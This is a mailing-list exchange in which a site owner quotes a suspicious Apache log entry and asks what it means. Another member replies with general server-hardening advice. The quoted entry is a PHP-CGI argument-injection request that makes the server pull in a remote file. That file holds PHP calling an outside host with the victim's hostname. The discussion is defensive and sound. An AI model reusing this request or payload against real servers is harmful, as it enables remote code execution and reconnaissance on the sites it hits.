[OT] server log entry?

Thierry Douez th.douez at gmail.com
Fri May 24 13:18:34 EDT 2013 

Hi Richard,

Thanks for your looong answer :)


2013/5/24 Richard Gaskin <ambassador at fourthworld.com>

> Thierry Douez wrote:
>
>> Here is the line:
>>
>> 193.107.17.36 ... "GET
>> /?-n+-dallow_url_include%3DOn+**-dauto_prepend_file%3Dhttp://
>> gofastdownload.com/rf/s.txt HTTP/1.1" 200 6027 "-" "Python-urllib/2.6"
>>
>> The file ../rf/s.txt  contains:
>>
>> <?php file_get_contents('
>> http://gofastdownload.com/rf/**s.php?d='.$_SERVER['HTTP_HOST'**]<http://gofastdownload.com/rf/s.php?d='.$_SERVER['HTTP_HOST']>);
>> exit(0);
>>
> ?>
>
>>
>> The IP point in the middle of nowhere in Russia.
>>
>> and finally I know nothing about php.
>>
> ...
>
>  If someone has some more precise answer, I"m still interested :)
>>
>
> I don't have anything more specific on that, but I find it interesting
> that it appears to have been successful (result code 200).
>

> On most Apache and auth logs you'll find a great many attempts at all
> sorts of exploits, and most fail simply because the file they're looking
> for isn't there, or has been adequately protected against such attacks.
>

Well, in this case, the URI is "/" which is accepted as my home page.
And here, it's only the parameters which are obscure to me.
Apparently nothing bad happened, but was just trying to understand to maybe
add some extra rules to my htaccess file.


> As a general rule I try to stay current with all server components (MySQL,
> PHP, any frameworks like Wordpress, Drupal, etc.), and most of the time
> staying current blocks malicious bots.
>

Nothing like that here.


That said, security is an ongoing process of cat and mouse, and no matter
> how frequently system components are updated there's always some new
> exploit being devised and deployed.
>
> I don't know enough about Python or your system setup to suggest how to
> prevent that specific attack, but in general if you move your CGI engines
> outside of the public HTML folder, lock down permissions as tightly as
> practical, and religiously sanitize inputs you can greatly minimize such
> risks.
>

This is how I've organised my web pages and didn't have any problems
but still, I keep an eye to the log files..
By the way, 90% of the exploits on my site in one year was against
wordpress !


> One more thing in favor of LiveCode Server:  until LC really takes off we
> get a minor benefit from "security by obscurity" - that is, it simply isn't
> worth most attackers' time to target LC because it's seldom used on the Web.
>

Umm, with the community edition, I guess it's not going to be true
forever...
  "la rancon de la gloire" :)

Anyway, next week I'm going to an Open-Source-Linux exhibition in Paris;
I'll bring this piece of code and ask to the php stand!

Thanks again,

Thierry

------------------------------------------------
Thierry Douez - http://sunny-tdz.com
Maker of sunnYperl - sunnYmidi - sunnYmage

More information about the use-livecode mailing list